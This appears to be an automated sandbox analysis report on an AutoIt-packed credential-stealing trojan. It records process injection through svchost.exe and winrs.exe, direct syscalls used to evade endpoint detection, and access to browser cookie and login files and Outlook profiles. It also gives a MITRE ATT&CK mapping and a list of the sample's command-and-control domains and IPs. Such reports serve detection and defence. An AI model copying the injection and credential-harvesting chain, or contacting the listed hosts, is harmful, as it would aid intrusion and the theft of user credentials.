                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EAA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EAA66C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E981AC
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E98189 SetUnhandledExceptionFilter,0_2_00E98189

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\winrs.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe protection: read write
                Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\winrs.exe | Thread register set: target process: 1196
                Source: C:\Windows\SysWOW64\winrs.exe | Thread APC queued: target process: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A21008
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EAB106 LogonUserW
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00E73D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EB411C SendInput,keybd_event
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EB74E7 mouse_event
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\KSts9xW7qy.exe"
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe | Process created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
                Source: C:\Windows\SysWOW64\winrs.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EAA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EB71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: KSts9xW7qy.exe, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520402128.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000000.1697274294.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000000.1847846628.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3520402128.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000000.1697274294.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000000.1847846628.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: KSts9xW7qy.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3520402128.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000000.1697274294.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000000.1847846628.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3520402128.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000000.1697274294.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000000.1847846628.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00E965C4 cpuid
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EC091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EEB340 GetUserNameW
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EA1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00E8DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\winrs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: KSts9xW7qy.exe | Binary or memory string: WIN_81
                Source: KSts9xW7qy.exe | Binary or memory string: WIN_XP
                Source: KSts9xW7qy.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: KSts9xW7qy.exe | Binary or memory string: WIN_XPe
                Source: KSts9xW7qy.exe | Binary or memory string: WIN_VISTA
                Source: KSts9xW7qy.exe | Binary or memory string: WIN_7
                Source: KSts9xW7qy.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EC8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EC923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count shown in the report for that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts
                Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture
                Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1586004; Sample: KSts9xW7qy.exe; Startdate: 08/01/2025; Architecture: WINDOWS; Score: 100

Start node
  DNS/IP: www.dating-apps-az-dn5.xyz; www.beylikduzu616161.xyz (Performs DNS queries to domains with low reputation); 15 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
  started: KSts9xW7qy.exe 2
KSts9xW7qy.exe
  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  started: svchost.exe
svchost.exe
  Signatures: Maps a DLL or memory area into another process
  injected: pTPcvfjkbwUWkD.exe
pTPcvfjkbwUWkD.exe (injected)
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  started: winrs.exe 13
winrs.exe
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
  injected: pTPcvfjkbwUWkD.exe
  started: firefox.exe
pTPcvfjkbwUWkD.exe (injected)
  DNS/IP: thaor56.online 202.92.5.23, 49803, 49820, 49838, VNPT-AS-VNVNPTCorpVN Viet Nam; www.earbudsstore.shop 194.195.220.41, 49895, 49911, 49927, NEXINTO-DE Germany; 9 other IPs or domains
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
KSts9xW7qy.exe | 71% | ReversingLabs | Win32.Trojan.AutoitInject
KSts9xW7qy.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://www70.earbudsstore.shop/ | 0% | Avira URL Cloud | safe
http://www.dating-apps-az-dn5.xyz/pn0u/ | 0% | Avira URL Cloud | safe
http://www.beylikduzu616161.xyz/2nga/ | 100% | Avira URL Cloud | malware
http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1736349235.9785162264&other_args=eyJ1cmkiOiAiLzBnaX | 0% | Avira URL Cloud | safe
http://www.earbudsstore.shop/0gis/ | 0% | Avira URL Cloud | safe
http://www.orbitoasis.online/k6yn/ | 100% | Avira URL Cloud | malware
http://www.maitreyatoys.world/dvmh/ | 0% | Avira URL Cloud | safe
http://www.dating-apps-az-dn5.xyz | 0% | Avira URL Cloud | safe
http://www.superiorfencing.net/bwyw/ | 0% | Avira URL Cloud | safe
http://www.dailyfuns.info/n9b0/ | 0% | Avira URL Cloud | safe
http://www.mydreamdeal.click/1ag2/ | 0% | Avira URL Cloud | safe
http://www.thaor56.online/cboa/ | 0% | Avira URL Cloud | safe
http://www.zxyck.net/gxyh/ | 0% | Avira URL Cloud | safe
http://www.75178.club/a4h7/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.mydreamdeal.click | 188.114.96.3 | true | true | | unknown
www.maitreyatoys.world | 194.245.148.189 | true | true | | unknown
www.zxyck.net | 118.107.250.103 | true | false | | high
www.dating-apps-az-dn5.xyz | 199.59.243.228 | true | true | | unknown
superiorfencing.net | 103.230.159.86 | true | true | | unknown
thaor56.online | 202.92.5.23 | true | true | | unknown
www.zkdamdjj.shop | 188.114.96.3 | true | false | | high
www.earbudsstore.shop | 194.195.220.41 | true | true | | unknown
www.beylikduzu616161.xyz | 188.114.97.3 | true | true | | unknown
www.dailyfuns.info | 209.74.77.109 | true | true | | unknown
gtml.huksa.huhusddfnsuegcdn.com | 23.167.152.41 | true | false | | high
orbitoasis.online | 66.29.132.194 | true | true | | unknown
www.75178.club | unknown | unknown | false | | unknown
www.orbitoasis.online | unknown | unknown | false | | unknown
www.superiorfencing.net | unknown | unknown | false | | unknown
www.thaor56.online | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.beylikduzu616161.xyz/2nga/ | true | Avira URL Cloud: malware | unknown
http://www.superiorfencing.net/bwyw/ | true | Avira URL Cloud: safe | unknown
http://www.maitreyatoys.world/dvmh/ | true | Avira URL Cloud: safe | unknown
http://www.orbitoasis.online/k6yn/ | true | Avira URL Cloud: malware | unknown
http://www.earbudsstore.shop/0gis/ | true | Avira URL Cloud: safe | unknown
http://www.dailyfuns.info/n9b0/ | true | Avira URL Cloud: safe | unknown
http://www.dating-apps-az-dn5.xyz/pn0u/ | true | Avira URL Cloud: safe | unknown
http://www.mydreamdeal.click/1ag2/ | true | Avira URL Cloud: safe | unknown
http://www.thaor56.online/cboa/ | true | Avira URL Cloud: safe | unknown
http://www.75178.club/a4h7/ | true | Avira URL Cloud: safe | unknown
http://www.zxyck.net/gxyh/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1736349235.9785162264&other_args=eyJ1cmkiOiAiLzBnaX | winrs.exe, 00000003.00000002.3521201601.00000000043BC000.00000004.10000000.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.00000000032FC000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
